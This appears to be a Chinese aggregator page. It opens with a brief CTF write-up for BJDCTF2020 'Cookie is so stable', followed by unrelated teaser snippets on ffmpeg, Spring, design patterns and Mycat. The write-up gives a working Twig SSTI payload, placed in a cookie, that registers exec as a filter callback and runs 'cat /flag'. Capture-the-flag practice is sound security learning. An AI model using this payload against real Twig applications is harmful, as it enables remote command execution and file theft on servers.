[BJDCTF2020]Cookie is so stable

news/2024/5/19 22:26:14 标签: ctf, web

hint提示查看cookies

flag.php页面我们先随便输入一个名字

输入后我们重新进一次flag.php，发现cookie里存储了刚刚登陆时输入的用户名，直接猜是ssti

尝试后根据ssti特征判断是twig模板

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

这里貌似只能显示一行，ls显示不全，所以直接猜flag在根目录下了

http://www.niftyadmin.cn/n/5432210.html

qt+ffmpeg 实现音视频播放（一）

一、ffmpeg下载官网：点击跳转二、模块介绍 1. libavcodec：音视频编解码库，提供了多种编解码器，可以支持多种音视频格式的编解码操作。 2. libavformat：音视频封装和解封装库，提供了多种封装格式的支持…

AntPathMatcher【Spring中提供的路径匹配器】

举个例子我们要求所有以html结尾的访问，都放行那我们只需要写出用AntPathMatcher判断访问url是否与/**/*.html匹配便可以知道结果

Spring 被打暴了！ vs Javalin vs Solon

测试仅供参考。不同的环境、场景，效果会不同。测试记录： 项目SpringBoot2SpringBoot3JavalinSolon运行时java 17java 17java 17java 17测试前状态/内存101.1Mb112.9Mb66.1Mb45.6Mb测试后状态/内存996.3Mb326.9Mb457.3Mb369.2Mb测试后状态/并发2万2.6万…

【设计模式】Java 设计模式之代理模式（Proxy Pattern）

代理模式深入分析一、概述代理模式是一种为其他对象提供一种代理以控制对这个对象的访问的设计模式。在某些情况下，一个对象不适合或者不能直接访问另一个对象，而代理对象可以在客户端和目标对象之间起到中介的作用。代理模式的主要目的是&#xf…

#include<iostream> #include<cmath> #include<queue> #include<cstring> #include<cstdlib> #include<algorithm> using namespace std; const int N1e510; int n,m,a,b; int e[N],ne[N],h[N],idx; int d[N],top[N],cnt1;//top是拓扑排序…

小程序学习4 mock

services/home.js import { config, cdnBase } from ../../config/index;/** 获取首页数据 */ function mockFetchHome() {const { delay } require(../_utils/delay);const { genSwiperImageList } require(../../model/swiper);return delay().then(() > {return {swip…

初识Spring MVC

什么是Spring MVC? 官方给的解释是 Spring Web MVC 是基于 Servlet API 构建的原始 Web 框架，从⼀开始就包含在 Spring 框架中。它的正式名称“Spring Web MVC”来⾃其源模块的名称(Spring-webmvc)，但它通常被称为"Spring MVC" 注:Severlet是…

第109讲：Mycat实践指南：一致性Hash分片下的水平分表详解

文章目录 1.一致性Hash分片的概念2.使用一致性Hash分片对某张表进行水平拆分2.1.在所有的分片节点中创建表结构2.2.配置Mycat实现一致性Hash分片的水平分表2.2.1.配置Schema配置文件2.2.2.配置Rule分片规则配置文件2.2.3.配置Server配置文件2.2.4.重启Mycat 2.3.写入数据观察分…